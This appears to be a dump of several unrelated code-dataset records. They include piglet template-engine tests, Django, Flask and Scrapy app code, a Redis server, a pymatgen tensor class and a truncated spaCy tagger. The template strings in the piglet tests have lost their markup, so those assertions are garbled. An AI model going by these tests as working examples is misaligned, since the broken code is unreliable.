\"\n\n def test_pycall_calls_with_positional_args(self):\n t = Template(\n 'foo: ${a()}'\n ''\n \"bar\"\n \"\"\n )\n s = t.render({})\n assert s == \"foo: bar\"\n\n def test_pycall_calls_with_keyword_args(self):\n t = Template(\n 'foo: ${a()}'\n ''\n 'bar'\n \"\"\n )\n s = t.render({})\n assert s == \"foo: bar\"\n\n def test_pycall_keywords_have_access_to_local_ns(self):\n t = Template(\n 'foo: ${a()}'\n ''\n ''\n '$x'\n \"\"\n \"\"\n )\n s = t.render({})\n assert s == \"foo: 1\"\n\n def test_pycalls_can_be_nested(self):\n t = Template(\n 'foo: $a'\n ''\n ''\n \"\"\n \"\"\n )\n s = t.render({})\n assert s == \"foo: baz\"\n\n def test_unescaped_function_calls_dont_raise_an_error(self):\n tt = Template(\n '$!{bar()}'\n '$x'\n \"$!{foo()}\"\n )\n assert tt.render({\"x\": u\"café\"}) == u\"café\"\n\n def test_it_compiles_pyattrs(self):\n t = Template(\"x\")\n s = t.render({})\n assert s == 'x'\n\n def test_it_compiles_pycomment(self):\n t = Template('A$xB$yC')\n s = t.render({})\n assert s == \"ABC\"\n\n def test_it_compiles_pytag(self):\n t = Template('x')\n assert t.render({\"x\": \"div\"}) == \"
x
\"\n assert t.render({\"x\": \"span\"}) == \"x\"\n\n t = Template('
    x
')\n assert t.render({\"x\": \"div\"}) == \"
x
\"\n\n t = Template('x')\n assert t.render({\"x\": \"div\"}) == \"
x
\"\n\n t = Template('')\n assert t.render({\"x\": \"amp-img\"}) == ''\n\n def test_it_compiles_filter_node(self):\n t = Template('x')\n assert t.render({\"f\": lambda s: s.upper()}) == \"X\"\n\n t = Template('

x

')\n assert t.render({}) == \"

X

\"\n\n def test_py_include_can_be_nested_in_py_def(self):\n with create_templates(\n [\n (\n \"a\",\n (\n u''\n u''\n u\"\"\n u\"${a()}\"\n ),\n ),\n (\"b\", u\"whoa nelly!\"),\n ]\n ) as d:\n loader = TemplateLoader([d])\n assert loader.load(\"a\").render({}) == \"whoa nelly!\"\n\n\nclass TestPyBlock:\n def test_it_evalutes_pyblock_replacement(self):\n with create_templates(\n [\n (\"a\", u'A'),\n (\n \"b\",\n (\n u''\n u'B'\n ),\n ),\n ]\n ) as d:\n loader = TemplateLoader([d])\n assert loader.load(\"b\").render({}) == \"B\"\n\n def test_it_evalutes_pyblock_replacement_with_super(self):\n with create_templates(\n [\n (\"a\", u'A'),\n (\n \"b\",\n (\n u''\n u'B ${super()}'\n u\"\"\n ),\n ),\n ]\n ) as d:\n loader = TemplateLoader([d])\n assert loader.load(\"b\").render({}) == \"B A\"\n\n def test_it_evaluates_nested_pyblocks_with_super(self):\n with create_templates(\n [\n (\n \"a\",\n (\n u''\n u\"Apage \"\n u'Ahead'\n u\"\"\n ),\n ),\n (\n \"b1\",\n (\n u''\n u'B'\n u\"\"\n ),\n ),\n (\n \"b2\",\n (\n u''\n u'B ${super()}'\n u\"\"\n ),\n ),\n ]\n ) as d:\n loader = TemplateLoader([d])\n assert loader.load(\"b1\").render({}) == \"B\"\n assert loader.load(\"b2\").render({}) == \"Apage B Ahead\"\n\n def test_it_evaluates_intermediate_supers_once_only(self):\n with create_templates(\n [\n (\"a\", (u'A')),\n (\n \"b\",\n (\n u''\n u'B ${super()}'\n u\"\"\n ),\n ),\n (\"c\", (u'')),\n ]\n ) as d:\n loader = TemplateLoader([d])\n assert loader.load(\"c\").render({}) == \"B A\"\n\n def test_it_replaces_blocks_over_deep_hierarchy(self):\n with create_templates(\n {\n \"a\": u\"\"\"\n A INTRO\n \n A HEADING\n \"\"\",\n \"b\": u\"\"\"\n \n \n B CONTENT\n B HEADING\n \n \"\"\",\n \"c\": u\"\"\"\n \n C HEADING\n \n \"\"\",\n }\n ) as d:\n loader = TemplateLoader([d])\n s = loader.load(\"c\").render({})\n assert normspace(s) == \"A INTRO B CONTENT C HEADING\"\n\n def test_it_replaces_blocks_over_deep_hierarchy2(self):\n with create_templates(\n {\n \"a\": u\"\"\"A INTRO \"\"\",\n \"b\": u\"\"\"\n \n B CONTENT\n B HEADING\n \n \"\"\",\n \"c\": u\"\"\"\n C HEADING\n \n \"\"\",\n }\n ) as d:\n loader = TemplateLoader([d])\n s = loader.load(\"c\").render({})\n assert normspace(s) == \"A INTRO B CONTENT C HEADING\"\n\n def test_it_replaces_blocks_over_deep_hierarchy3(self):\n with create_templates(\n {\n \"a\": u\"\"\"A INTRO \"\"\",\n \"b\": u\"\"\"\"\"\",\n \"c\": u\"\"\"\n C\n \n \"\"\",\n }\n ) as d:\n loader = TemplateLoader([d])\n s = loader.load(\"c\").render({})\n assert normspace(s) == \"A INTRO C\"\n\n def test_it_calls_super_over_deep_hierarchy(self):\n with create_templates(\n {\n \"a\": u\"\"\"A\"\"\",\n \"b\": u\"\"\"\n ${super()} B\"\"\",\n \"c\": u\"\"\"\n ${super()} C\"\"\",\n }\n ) as d:\n loader = TemplateLoader([d])\n s = loader.load(\"c\").render({})\n assert normspace(s) == \"A B C\"\n\n def test_it_keeps_defs_inside_extends(self):\n with create_templates(\n {\n \"a\": u\"\"\"A\"\"\",\n \"b\": u\"\"\"\n HELLO\n ${f()}\"\"\",\n }\n ) as d:\n loader = TemplateLoader([d])\n s = loader.load(\"b\").render({})\n assert normspace(s) == \"HELLO\"\n\n def test_template_render_calls_can_be_interleaved(self):\n \"\"\"\n Interleaving calls to templates can happen when one template calls\n another. Normally you'd do this with py:include, but sometimes it's\n useful to be able to render a sub template completely separately\n with its own context dict. Problem is the runtime.data.context\n has global scope, so the inner template stomps over the caller's\n context.\n\n NB it's tempting to pass __piglet_ctx around as a parameter to all\n template functions, removing the need for the threading.local entirely.\n However that entails either (A) requiring the user to add a\n __piglet_ctx parameter to every template function call or (B) requiring\n the user to use the syntax so we can hook into the call and\n inject the parameter, or (C) manipulating the ast to find function\n calls and autoinject parameters.\n\n (A) is clunky (and I don't like exposing __piglet_ctx to the user)\n (B) is simple but adds an inconsistency, and it annoys me that the\n regular python function call syntax wouldn't available for template\n functions.\n (C) might be possible - I got as far as implementing this for functions\n defined in the same template, but gave up for functions imported using\n .\n \"\"\"\n with create_templates({\"a\": u\"$x ${b()} $x\", \"b\": u\"$y$y$y\",}) as d:\n loader = TemplateLoader([d])\n a = loader.load(\"a\")\n b = loader.load(\"b\")\n s = a.render({\"x\": 2, \"b\": lambda: b.render({\"y\": 3})})\n assert s == \"2 333 2\"\n\n def test_pywith_on_extends_tag(self):\n \"\"\"\n Sometimes in a layout template you want to make an attribute\n customizable. Using py:block isn't possible\n (eg ```` is not well\n formed), so a workaround is::\n\n \n \n ...\n \n\n\n \n \n \n \"\"\"\n with create_templates(\n [\n (\"a\", u''),\n (\"b\", u''),\n ]\n ) as d:\n loader = TemplateLoader([d])\n assert loader.load(\"b\").render({}) == ''\n\n def test_dynamic_pyextends(self):\n with create_templates(\n [\n (\"foo\", u\"

foo

\"),\n (\"bar\", u\"

bar

\"),\n (\"main\", u''),\n ]\n ) as d:\n loader = TemplateLoader([d])\n assert loader.load(\"main\").render({\"t\": \"foo\"}) == \"

foo

\"\n assert loader.load(\"main\").render({\"t\": \"bar\"}) == \"

bar

\"\n\n\nclass TestExceptionHandling:\n def test_it_raises_compile_exception_at_template_line_number(self):\n for x in range(5):\n try:\n Template((\"\\n\" * x) + '')\n except PigletError as e:\n assert \"line {}\".format(x + 1) in str(e)\n else:\n assert False\n\n def test_it_raises_runtime_exception_at_template_line_number(self):\n for x in range(5):\n t = Template((\"\\n\" * x) + '')\n try:\n list(t({}))\n except ZeroDivisionError as e:\n assert \"line {}\".format(x + 1) in str(e)\n else:\n assert False\n\n def test_it_raises_exception_in_correct_file(self):\n with create_templates(\n [(\"a.html\", u''), (\"b.html\", u\"${1 / 0.0}\"),]\n ) as d:\n loader = TemplateLoader([d])\n try:\n loader.load(\"a.html\").render({})\n except ZeroDivisionError as e:\n assert \"b.html\" in str(e)\n else:\n assert False\n\n def test_it_raises_interpolation_exception_at_right_lineno(self):\n for x in range(1, 5):\n with create_templates(\n [\n (\"a.html\", u''),\n (\"b.html\", (u\"\\n\" * x) + \"${a.b}\"),\n ]\n ) as d:\n loader = TemplateLoader([d])\n try:\n loader.load(\"a.html\").render({\"a\": object()})\n except AttributeError as e:\n assert 'b.html\", line {}'.format(x + 1) in str(e)\n else:\n assert False\n\n\n@pytest.mark.skipif(\n sys.version_info < (3, 0), reason=\"astunparse output differs in py2\"\n)\nclass TestHoistVariables:\n def test_it_raises_an_error(self):\n mod = ast.parse(\"print(x)\")\n with pytest.raises(AssertionError):\n piglet.compile._hoist_variables_to_piglet_context(mod)\n\n def test_it_rewrites(self):\n mod = ast.parse(\"def foo():\\n\" \" yield x\")\n\n piglet.compile._hoist_variables_to_piglet_context(mod)\n assert astunparse.unparse(mod) == (\n \"\\n\"\n \"\\n\"\n \"def foo():\\n\"\n \" __piglet_ctx = __piglet_rtdata.context[-1]\\n\"\n \" x = __piglet_ctx.get('x', __piglet_rt.Undefined('x'))\\n\"\n \" (yield x)\\n\"\n )\n\n def test_it_doesnt_rewrite_assignments(self):\n mod = ast.parse(\"def foo():\\n\" \" x = 'foo'\\n\")\n\n piglet.compile._hoist_variables_to_piglet_context(mod)\n assert astunparse.unparse(mod) == (\n \"\\n\"\n \"\\n\"\n \"def foo():\\n\"\n \" __piglet_ctx = __piglet_rtdata.context[-1]\\n\"\n \" x = 'foo'\\n\"\n )\n\n def test_it_doesnt_rewrite_loop_vars(self):\n mod = ast.parse(\"def foo():\\n\" \" for x in []: pass\\n\")\n\n piglet.compile._hoist_variables_to_piglet_context(mod)\n assert astunparse.unparse(mod) == (\n \"\\n\"\n \"\\n\"\n \"def foo():\\n\"\n \" __piglet_ctx = __piglet_rtdata.context[-1]\\n\"\n \" for x in []:\\n\"\n \" pass\\n\"\n )\n\n def test_it_doesnt_rewrite_func_args(self):\n mod = ast.parse(\"def foo(x=None):\\n\" \" yield x\\n\")\n\n piglet.compile._hoist_variables_to_piglet_context(mod)\n assert astunparse.unparse(mod) == (\n \"\\n\"\n \"\\n\"\n \"def foo(x=None):\\n\"\n \" __piglet_ctx = __piglet_rtdata.context[-1]\\n\"\n \" (yield x)\\n\"\n )\n\n def test_it_isnt_confused_by_earlier_function_args(self):\n mod = ast.parse(\"def a(foo): \\n\" \" pass\\n\" \"def b():\\n\" \" a(foo)\\n\")\n\n piglet.compile._hoist_variables_to_piglet_context(mod)\n assert astunparse.unparse(mod) == (\n \"\\n\"\n \"\\n\"\n \"def a(foo):\\n\"\n \" __piglet_ctx = __piglet_rtdata.context[-1]\\n\"\n \" pass\\n\"\n \"\\n\"\n \"def b():\\n\"\n \" __piglet_ctx = __piglet_rtdata.context[-1]\\n\"\n \" foo = __piglet_ctx.get('foo', __piglet_rt.Undefined('foo'))\\n\"\n \" a(foo)\\n\"\n )\n\n def test_it_defaults_builtins(self):\n mod = ast.parse(\"def foo():\\n\" \" yield id\")\n\n piglet.compile._hoist_variables_to_piglet_context(mod)\n assert astunparse.unparse(mod) == (\n \"\\n\"\n \"\\n\"\n \"def foo():\\n\"\n \" __piglet_ctx = __piglet_rtdata.context[-1]\\n\"\n \" id = __piglet_ctx.get('id', __piglet_rt.builtins.id)\\n\"\n \" (yield id)\\n\"\n )\n\n def test_it_isnt_confused_by_argument_defaults(self):\n mod = ast.parse('def foo(bar=\"x\".upper):\\n' \" bar()\\n\")\n\n piglet.compile._hoist_variables_to_piglet_context(mod)\n assert astunparse.unparse(mod) == (\n \"\\n\"\n \"\\n\"\n \"def foo(bar='x'.upper):\\n\"\n \" __piglet_ctx = __piglet_rtdata.context[-1]\\n\"\n \" bar()\\n\"\n )\n\n def test_it_doesnt_rewrite_function_refs(self):\n mod = ast.parse(\n \"def foo():\\n\" \" return bar()\\n\" \"def bar():\\n\" \" return foo\\n\"\n )\n\n piglet.compile._hoist_variables_to_piglet_context(mod)\n assert astunparse.unparse(mod) == (\n \"\\n\"\n \"\\n\"\n \"def foo():\\n\"\n \" __piglet_ctx = __piglet_rtdata.context[-1]\\n\"\n \" return bar()\\n\"\n \"\\n\"\n \"def bar():\\n\"\n \" __piglet_ctx = __piglet_rtdata.context[-1]\\n\"\n \" return foo\\n\"\n )\n\n def test_it_handles_name_on_both_sides_of_assigment(self):\n mod = ast.parse(\"def foo():\\n\" \" bar = bar\\n\")\n\n piglet.compile._hoist_variables_to_piglet_context(mod)\n assert astunparse.unparse(mod) == (\n \"\\n\"\n \"\\n\"\n \"def foo():\\n\"\n \" __piglet_ctx = __piglet_rtdata.context[-1]\\n\"\n \" bar = __piglet_ctx.get('bar', __piglet_rt.Undefined('bar'))\\n\"\n \" bar = bar\\n\"\n )\n\n\ndef test_it_doesnt_autoescape_in_cdata():\n t = Template(\"\")\n assert t.render({\"x\": \"<&>\"}) == \"\"\n","sub_path":"venv/Lib/site-packages/piglet/test_piglet.py","file_name":"test_piglet.py","file_ext":"py","file_size_in_byte":24789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"504644376","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\nfrom itertools import chain\n\nfrom places.models import Hotel, Cafe\n\nclass SavedPlaces(models.Model):\n \"\"\"Model for saved places.\"\"\"\n\n saved_hotels = models.ForeignKey(Hotel, on_delete=models.CASCADE)\n saved_cafes = models.ForeignKey(Cafe, on_delete=models.CASCADE)\n\n\n @staticmethod\n def save_place(username, place_name):\n ids_places = Hotel.objects.values_list('id', flat=True).filter(name=place_name)\n\n if len(ids_places) == 0:\n ids_places = Cafe.objects.values_list('id', flat=True).filter(name=place_name)\n places_queryset = Cafe.objects.filter(pk__in=set(ids_places))\n else:\n places_queryset = Hotel.objects.filter(pk__in=set(ids_places))\n\n place_object = places_queryset.filter(name=place_name).last()\n user_save = place_object.users_saved.filter(username=username)\n user = User.objects.filter(username=username)\n if len(user_save) == 0:\n place_object.users_saved.set(user)\n place_object.save()\n return True\n else:\n return False\n\n\n @staticmethod\n def show_place(username):\n id_user = User.objects.values_list('id', flat=True).filter(username=username).last()\n hotels_queryset = Hotel.objects.filter(users_saved=id_user)\n cafes_queryset = Cafe.objects.filter(users_saved=id_user)\n saved_places = list(chain(hotels_queryset, cafes_queryset))\n return saved_places","sub_path":"city_project/save_places_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"73242668","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy_splash import SplashRequest\nfrom ..items import RealestateItem\n\n\nclass GetEstateInfoSpider(scrapy.Spider):\n name = \"get_estate_info\"\n allowed_domains = [\"suumo.jp\"]\n start_urls = (\n 'http://suumo.jp/',\n )\n\n '''スクレイピング開始'''\n\n '''都道府県エリア選択ページからエリア名を取得後、遷移'''\n def parse(self, response):\n for area in response.css('a.areabox-link'):\n item = RealestateItem()\n # エリア名を取得\n str_area = area.css('div.areabox-title::text').extract_first()\n item['area'] = str_area\n # リンク先を取得\n href = area.css('::attr(href)').extract_first()\n next_page = response.urljoin(href)\n # 次のparserに渡す変数を設定し、リンク先に遷移\n yield scrapy.Request(next_page, callback=self.parse_to_chintai, meta={'item': item})\n\n '''都道府県エリアごとの賃貸ページに遷移'''\n def parse_to_chintai(self, response):\n item = response.meta['item']\n # 賃貸ページのみを取得\n if response.css('a.ui-btn.ui-btn--base.areamenu-btn::text').extract_first() == '賃貸物件':\n href = response.css('a.ui-btn.ui-btn--base.areamenu-btn::attr(href)').extract_first()\n next_page = response.urljoin(href)\n # 次のparserに渡す変数を設定し、リンク先に遷移\n yield scrapy.Request(next_page, callback=self.parse_to_pref, meta={'item': item})\n\n '''都道府県ごとのページに遷移'''\n def parse_to_pref(self, response):\n # 都道府県名を取得\n for pref in response.css('dt.areabox-title'):\n item = {}\n # item = RealestateItem()\n str_pref = pref.css('a::text').extract_first()\n item[str_pref] = response.meta['item']\n item[str_pref]['pref'] = str_pref\n # リンク先を取得\n href = pref.css('a::attr(href)').extract_first()\n next_page = response.urljoin(href)\n # 次のparserに渡す変数を設定\n yield scrapy.Request(next_page, callback=self.parse_to_ensen,# meta={'item': item})\n meta={'id': str_pref, 'item:' + str_pref: item[str_pref]})\n # request.meta['item'] = item\n # # リンク先に遷移\n # yield request\n # return scrapy.Request(next_page, callback=self.parse_to_ensen), str_pref\n\n '''沿線検索のページに遷移'''\n def parse_to_ensen(self, response):\n # 前のparserからitemを取得\n item = {}\n # item = RealestateItem()\n id = response.meta['id']\n item[id] = response.meta['item:' + id]\n # item = response.meta['item']\n # 沿線検索ページのみを取得(エリアページは取得しない)\n href = response.css('ul.itemlist_group li a::attr(href)').extract()\n # l_href = href.split('/')\n for i in href:\n l_href = i.split('/')\n if l_href[len(l_href) - 2] == 'ensen':\n next_page = response.urljoin(i)\n # 次のparserに渡す変数を設定し、リンク先に遷移\n yield scrapy.Request(next_page, callback=self.parse_to_eki, # meta = {'item': item})\n meta = {'id': id, 'item:' + id: item})\n # return scrapy.Request(next_page, callback=self.parse_to_eki)\n\n '''路線ごとの駅名検索のページに遷移'''\n def parse_to_eki(self, response):\n # 前のparserからitemを取得\n item = RealestateItem()\n id = response.meta['id']\n item[id] = response.meta['item:' + id]\n # item = response.meta['item']\n for line in response.css('ul.searchitem-list li label'):\n # 路線名を取得\n str_line = line.css('a::text').extract_first()\n item['line'] = str_line\n # # リンクを取得\n # href = line.css('a::attr(href)').extract_first()\n # next_page = response.urljoin(href)\n # # 次のparserに渡す変数を設定\n # request = scrapy.Request(next_page, callback=self.parse_estate)\n # request.meta['item'] = item\n # # リンク先に遷移\n # yield request\n # # yield scrapy.Request(next_page, callback=self.parse_estate)\n yield item\n #\n # # 駅ごとの物件情報をスクレイピング\n # def parse_estate(self, response):\n # # 沿線検索ページのみを取得(エリアページは取得しない)\n # href = response.css('ul.searchitem-list li label span::text').extract()\n # item = RealestateItem()\n # item['pref'] = str_pref\n # item['area'] = str_area\n # # item['city'] =\n # item['line'] = str_line # 鉄道路線\n # item['station'] = response.css('ul.searchitem-list li label span::text').extract_first() # 駅名\n # # item['access'] # 駅からの距離\n # # item['apartment_type'] # 物件タイプ(アパート、マンション、その他)\n # # item['price']\n # # item['kanrihi']\n # # item['sikikin']\n # # item['reikin']\n # # item['size'] # 専有面積\n # # item['madori']\n # # item['year_built']\n # return item\n","sub_path":"build/lib/RealEstate/spiders/get_estate_info.py","file_name":"get_estate_info.py","file_ext":"py","file_size_in_byte":5475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"279487778","text":"import sys\n\ndef pascal(k,N):\n if N == 1:\n print('1')\n return\n if N == 2:\n print('1')\n print('1 1')\n return\n if k <= 1:\n k += 1\n print('1 '* k)\n pascal(k+1,N)\n elif k == N:\n b = ['1'] + [str(k-1)] * (k-2) + ['1']\n a = ' '.join(b)\n print(a)\n return \n else:\n b = ['1'] + [str(k-1)] * (k-2) + ['1']\n a = ' '.join(b)\n print(a)\n pascal(k+1,N)\n\n\nsys.stdin = open('input6.txt','r')\nT = int(input())\nfor tc in range(1,T+1):\n N = int(input())\n print('#{}'.format(tc))\n pascal(0,N)\n","sub_path":"9월/0903/파스칼의 삼각형.py","file_name":"파스칼의 삼각형.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"94330070","text":"from channel import Server\n\nimport json\n\nimport gevent\nimport redis\n\nfrom gevent import monkey\nmonkey.patch_all()\n\n\nr = redis.StrictRedis(decode_responses=True)\nchannel = Server('channel1', r)\n\n\ndef handle_req(_id, _value):\n\n # process the message\n values = json.loads(_value)\n\n # send response\n channel.send_rsp(_id, json.dumps({\n \"cnt\": str(values['cnt']),\n \"msg\": values['data'] + '_processed'\n }))\n\n # acknowledge message\n channel.ack_req(_id)\n\n return True\n\n\nprint('serving ...')\nwhile True:\n\n # receive the message\n req_id, req = channel.recv_req()\n\n # handle the message\n if not gevent.spawn(handle_req, req_id, req):\n break\n","sub_path":"test/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"625876961","text":"from app.main import bp\nfrom app import db\nfrom flask import render_template, flash, redirect, url_for, request, send_file, session, current_app\n\nfrom app.main.forms import ContactForm, auditaideForm\nfrom app.models import User\nfrom flask_login import current_user, login_required\nfrom flask_mail import Message\nfrom app.models import User\nfrom app.email import send_email\nfrom threading import Thread\nfrom app.main.utils import keywords, duration, oddTimes, noteLength, duplicate_notes, overlapping_notes, non_contiguous, start_time, end_time, test_file_for_blanks, test_file_for_expected_types, total_duration, total_duration_per_day, keywords_inverse\nfrom openpyxl import load_workbook, Workbook\nfrom openpyxl.writer.excel import save_virtual_workbook\nfrom app.main.email import send_contact_email\n\nalhpa_list = []\n\n@bp.route('/')\n@bp.route('/index')\ndef index():\n return render_template('index.html', title='Home')\n\ndef allowed_file(filename):\n ALLOWED_EXTENSIONS = set(['xlsx', 'xls'])\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@bp.route('/auditaide', methods=['GET','POST'])\n@login_required\ndef edit_auditaide():\n form = auditaideForm()\n if form.validate_on_submit():\n current_user.keywords = form.keywords.data\n current_user.high_duration = form.high_duration.data\n current_user.low_duration = form.low_duration.data\n current_user.note_length = form.note_length.data\n current_user.start_time_before = form.start_time_before.data\n current_user.start_time_after = form.start_time_after.data\n current_user.end_time_before = form.end_time_before.data\n current_user.end_time_after = form.end_time_after.data\n db.session.commit()\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n file = request.files['file']\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n webfile = request.files['file']\n else:\n flash('Choose xlsx or xls files only')\n return redirect(request.url)\n trngfile = load_workbook(webfile) #read_only=True slows down\n ### --- Variables to pass to functions in utils.py --- ###\n ws = trngfile.active\n\n pass_test_for_blanks, msg_blanks = test_file_for_blanks(ws)\n pass_test_for_chars, msg = test_file_for_expected_types(ws)\n \n if pass_test_for_chars and pass_test_for_blanks:\n results_list = [] # This should be passed from function to function, then written to final Xlsx file.\n html_keyword = request.form['keywords']\n my_list0 = html_keyword.split(\",\")\n my_list = [x.strip().lower().replace('?',' ') for x in my_list0]\n start_time_before= request.form['start_time_before'] # strings of 09:00 or 14:30\n start_time_after=request.form['start_time_after']\n end_time_before= request.form['end_time_before'] # strings of 09:00 or 14:30\n end_time_after=request.form['end_time_after']\n highduration = int(request.form['high_duration'])\n lowduration = int(request.form['low_duration'])\n note_length = int(request.form['note_length'])\n ### --- END Variables to pass to functions in utils.py --- ###\n try:\n start_hour_before = int(start_time_before.split(\":\")[0])\n start_min_before = int(start_time_before.split(\":\")[1])\n start_hour_after = int(start_time_after.split(\":\")[0])\n start_min_after = int(start_time_after.split(\":\")[1])\n except:\n pass\n try:\n end_hour_before = int(end_time_before.split(\":\")[0])\n end_min_before = int(end_time_before.split(\":\")[1])\n end_hour_after = int(end_time_after.split(\":\")[0])\n end_min_after = int(end_time_after.split(\":\")[1])\n except:\n pass\n \n if request.form.get('keywordsbool'):\n if not request.form.get('keywordsinversebool'):\n keywords(ws, my_list, results_list)\n else:\n keywords_inverse(ws, my_list, results_list)\n if request.form.get('durationsbool'):\n duration(ws, highduration, lowduration, results_list)\n if request.form.get('note_lengthbool'):\n noteLength(ws, note_length, results_list)\n if request.form.get('duplicatesbool'):\n duplicate_notes(ws, results_list)\n if request.form.get('overlappingbool'):\n overlapping_notes(ws, results_list)\n if request.form.get('noncontigbool'):\n non_contiguous(ws, results_list)\n if request.form.get('start_time_bool'):\n start_time(ws, start_hour_before, start_min_before, start_hour_after, start_min_after, results_list)\n if request.form.get('end_time_bool'):\n end_time(ws, end_hour_before, end_min_before, end_hour_after, end_min_after, results_list)\n if request.form.get('dailytotaldurationbool'):\n total_duration_per_day(ws, results_list)\n if request.form.get('totaldurationbool'):\n total_duration(ws, results_list)\n\n\n from operator import itemgetter\n alpha_list = sorted(results_list, key=itemgetter(1)) # Sort nested list based on the 1th value (individuals name)\n\n flash(u'Your changes have been saved.', 'Success')\n return render_template( \"results.html\", alpha_list=alpha_list) #here's the problem!\n #session['my_list'] = alpha_list\n #return redirect(url_for('results'))\n \n else:\n flash(msg + msg_blanks, 'Error')\n \n return render_template('auditaide.html', title='Scan',\n form=form)\n \n\n elif request.method == 'GET':\n #form.username.data = current_user.username\n form.keywords.data = current_user.keywords\n form.high_duration.data = current_user.high_duration\n form.low_duration.data = current_user.low_duration\n form.note_length.data = current_user.note_length\n form.start_time_before.data = current_user.start_time_before\n form.start_time_after.data = current_user.start_time_after\n form.end_time_before.data = current_user.end_time_before\n form.end_time_after.data = current_user.end_time_after\n return render_template('auditaide.html', title='Scan',\n form=form)\n\n\n@bp.route('/features')\ndef features():\n return render_template('features.html', title='auditaide - Features')\n\n@bp.route('/pricing')\ndef pricing():\n return render_template('pricing.html', title='auditaide - Pricing')\n\n\n@bp.route('/contact',methods=['GET', 'POST'])\ndef contact():\n form = ContactForm()\n if request.method == 'POST':\n if not form.validate_on_submit():\n flash('All fields are required.')\n return render_template('contact.html', form=form)\n else:\n msg= \"\"\"\n From: %s <%s>\n %s, %s\n \"\"\" % (form.name.data, form.email.data, form.message.data, form.organization.data)\n msgHtml = \"

Hello

\"\n send_contact_email(form.organization.data, sender=current_app.config['ADMINS'][0],recipients=['mnoah66@gmail.com'], text_body=msg)\n return render_template('contact.html', success=True)\n \n \n elif request.method == 'GET':\n return render_template('contact.html', form=form)\n","sub_path":"app/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":7786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"255755484","text":"# coding: utf-8\n# Copyright (c) Pymatgen Development Team.\n# Distributed under the terms of the MIT License.\n\n\n\"\"\"\nThis module provides classes for the Piezoelectric tensor\n\"\"\"\nfrom pymatgen.core.tensors import Tensor\nimport numpy as np\nimport warnings\n\n__author__ = \"Shyam Dwaraknath\"\n__copyright__ = \"Copyright 2016, The Materials Project\"\n__version__ = \"1.0\"\n__maintainer__ = \"Shyam Dwaraknath\"\n__email__ = \"shyamd@lbl.gov\"\n__status__ = \"Development\"\n__date__ = \"Feb, 2016\"\n\n\nclass PiezoTensor(Tensor):\n \"\"\"\n This class describes the 3x6 piezo tensor in Voigt-notation\n \"\"\"\n\n def __new__(cls, input_array, tol=1e-3):\n \"\"\"\n Create an PiezoTensor object. The constructor throws an error if\n the shape of the input_matrix argument is not 3x3x3, i. e. in true\n tensor notation. Note that the constructor uses __new__ rather than\n __init__ according to the standard method of subclassing numpy\n ndarrays.\n\n Args:\n input_matrix (3x3x3 array-like): the 3x6 array-like\n representing the piezo tensor\n \"\"\"\n obj = super(PiezoTensor, cls).__new__(cls, input_array, check_rank=3)\n if not (obj - np.transpose(obj, (0, 2, 1)) < tol).all():\n warnings.warn(\"Input piezo tensor does \"\n \"not satisfy standard symmetries\")\n return obj.view(cls)\n","sub_path":"pymatgen/analysis/piezo.py","file_name":"piezo.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"610728379","text":"from django.http import JsonResponse\n\n\n# Create your views here.\n\ndef index(request):\n data = {\n 'Name' : 'Peter Godoy',\n 'Track' : 'Backend(Python)',\n 'Message' : 'Hi, mentor, you are doing a great job, thank you so much for the opportunity.'\n}\n return JsonResponse(data)\n\n","sub_path":"mysite/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"367141628","text":"from flask import *\nfrom whitenoise import WhiteNoise\napp = Flask(__name__, template_folder=\"./\")\napp.wsgi_app = WhiteNoise(app.wsgi_app,\n root='static/',\n prefix='static/',\n index_file='index.htm',\n autorefresh=True)\n\n\n@app.route('/')\ndef home():\n return render_template(\"index.html\")\n\n\nif __name__ == \"__main__\":\n app.run(threaded=True, port=5000)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"338203782","text":"#! /bin/python3\n\nimport en_core_web_lg\nimport json\nimport wikipedia\nimport datetime\nimport warnings\nwarnings.filterwarnings('ignore')\n\nnlp = en_core_web_lg.load()\n\n\nclass Tagger(object):\n\n def __init__(self, string):\n self.string_ = string\n self.okr = nlp(string)\n self.special_words = ['Grephy', 'grephy',\n 'OKR', 'okr', 'user', 'User', 'API']\n self.now = str(datetime.datetime.now())\n\n def process(self):\n self.nodes = {}\n self.edges = {}\n self.properties = {}\n self.output = {}\n\n # nodes based on nouns\n for word in self.okr:\n if word.like_url:\n word.tag_, word.dep_ = 'URL', 'URL'\n self.nodes[str(word)] = 'URL'\n elif word.dep_ == 'dobj' or word.dep_ == 'compound' or word.dep_ == 'pobj' or word.dep_ == 'nsubj':\n self.nodes[str(word)] = 'THING'\n\n # nodes updated to reflect named entities\n named_entities = {}\n for ent in self.okr.ents:\n if ent.text is False:\n named_entities[str(ent)] = (str(ent.label_))\n\n # custom filter to make sure named_entities doesn't overwrite important preset labels.\n for word in named_entities:\n if self.nodes[word] == 'URL':\n named_entities[word] = 'URL'\n\n # combines the named entity nodes with the noun self.nodes\n self.nodes.update(named_entities)\n\n # combines the events found by the entity extractor\n try:\n self.nodes.update(self.entity_extractor())\n except:\n pass\n\n # hardcoded meanings\n if 